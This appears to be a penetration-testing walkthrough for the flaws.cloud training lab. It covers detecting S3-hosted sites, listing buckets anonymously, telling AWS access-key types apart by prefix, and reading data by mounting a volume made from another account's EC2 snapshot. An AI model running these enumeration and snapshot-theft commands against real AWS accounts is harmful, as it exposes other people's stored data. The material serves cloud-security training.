# Enumeration

Check if the resolved domain contains the word "website".&#x20;

You can access the static website at: `flaws.cloud.s3-website-us-west-2.amazonaws.com` or the bucket at: `flaws.cloud.s3-us-west-2.amazonaws.com`.&#x20;

If you try to access a bucket but specify a different region in the domain name (for example, the bucket is in `bucket.s3.amazonaws.com` but you are trying to access `bucket.s3-website-us-west-2.amazonaws.com`), you will be redirected to the correct location.&#x20;

Test to see if a website is hosted in an s3 bucket

```
dig +nocmd flaws.cloud any +multiline +noall +answer
```

![get IP address](https://1508177803-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LSy0aAo8OKT4I-Ahftv%2F-MbRr5ZAB0-6hCPGmnP8%2F-MbRrxzalmQgxb99Mk08%2Fimage.png?alt=media\&token=11a5eb72-318d-46bb-81b9-e3ca040cc792)

Put IP in browser - it will redirect to AWS console s3 page.

Run `nslookup` on the IP to get the AWS s3 website

![](https://1508177803-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LSy0aAo8OKT4I-Ahftv%2F-MbRsD5DECUeId3AeP69%2F-MbRtHKgMqQJM3ohTYwg%2Fimage.png?alt=media\&token=a03fb612-60a1-43bc-810d-592ff92ce1d6)

{% hint style="success" %}
The site `flaws.cloud` is hosted as an S3 bucket. This is a great way to host a static site, similar to hosting one via github pages. Some interesting facts about S3 hosting: When hosting a site as an S3 bucket, the bucket name (`flaws.cloud`) must match the domain name (`flaws.cloud`). Also, S3 buckets are a global name space, meaning two people cannot have buckets with the same name. The result of this is you could create a bucket named apple.com and Apple would never be able host their main site via S3 hosting.
{% endhint %}

### Check for common s3 bucket misconfigurations

```
/bucketflaws.sh -u flaws.cloud -o -p -d
```

![](https://1508177803-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LSy0aAo8OKT4I-Ahftv%2F-MbRtTA7H7ySpG8BAWpN%2F-MbSn5q_GK6p3fp66UKN%2Fimage.png?alt=media\&token=85d24d9d-7e28-4b4e-a9a2-b8f93703fa25)

Using the AWS cli

```
aws s3 ls  s3://flaws.cloud/ --no-sign-request --region us-west-2
```

Will list the files in the bucket

You can also list the files by going to <http://flaws.cloud.s3.amazonaws.com/>

![S3 bucket with "Everyone" having "List" permissions](https://1508177803-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LSy0aAo8OKT4I-Ahftv%2F-MbRtTA7H7ySpG8BAWpN%2F-MbT0-JjJd7RiWoDGhDp%2Fimage.png?alt=media\&token=7ad77615-bcc5-4683-8f21-e65bef4d2ae6)

### Different Types of Access Keys

`AKIAJ366LIPB4IJKT7SA` = long term access key - note the **AKIA**

`ASIAJ366LIJGULDN21D` = session access key - note the **ASIA**

### Get Snapshots

AWS allows you to take snapshots of EC2 and databases (RDS). The main purpose for this is to create backup copies, but sometimes users use snapshots to regain access to their own EC2s if they forget passwords.&#x20;

{% hint style="success" %}
AWS allows you to take snapshots of EC2 and databases (RDS). The main purpose for this is to create backups, but sometimes people use snapshots to regain access to their own EC2s if they forget passwords. This also allows attackers to get access to things. Snapshots are usually limited to your own account. So a possible attack would be for an attacker to get access to an AWS key that allows them to start/stop EC2s and do other things to EC2s, and then use that to take a snapshot of an EC2 and start an EC2 with that volume in your environment to gain access to it. As with all backups, you need to be careful to protect them.
{% endhint %}

Look for snapshots that this user has access to (note the `SnapshotId`):&#x20;

{% hint style="info" %}
remember to include the --owner-id else you will get a lot of output that is not relevant
{% endhint %}

```
aws ec2 describe-snapshots --profile flaws3 --owner-id 975426262029 --region us-west-2
```

![get SnapshotId](https://1508177803-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LSy0aAo8OKT4I-Ahftv%2F-MbVWEgw3pFEVDuXINW5%2F-MbVbutRXtpLaoCrPU-d%2Fimage.png?alt=media\&token=672c63bd-dd60-421c-bb6a-22ca997b5db0)

```
aws ec2 create-volume --profile default --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89    
```

![launch an ec2 instance and attach the volume](https://1508177803-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LSy0aAo8OKT4I-Ahftv%2F-MbVcBh3P1oVMJ0zwMrU%2F-MbWE8EsOydh0VDRM7qw%2Fimage.png?alt=media\&token=ae73ab3c-23c2-4308-91e8-97ebaecbda57)

run `lsblk` to see if disk is attached

![](https://1508177803-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LSy0aAo8OKT4I-Ahftv%2F-MbVcBh3P1oVMJ0zwMrU%2F-MbWETyEXJuPoU4yCk9q%2Fimage.png?alt=media\&token=ee63d628-ae3d-44c7-9883-5152b81425b5)

Then run sudo mount `/dev/xvdf1 /mnt` to mount the drive, browse to `/mnt` to view snapshot disk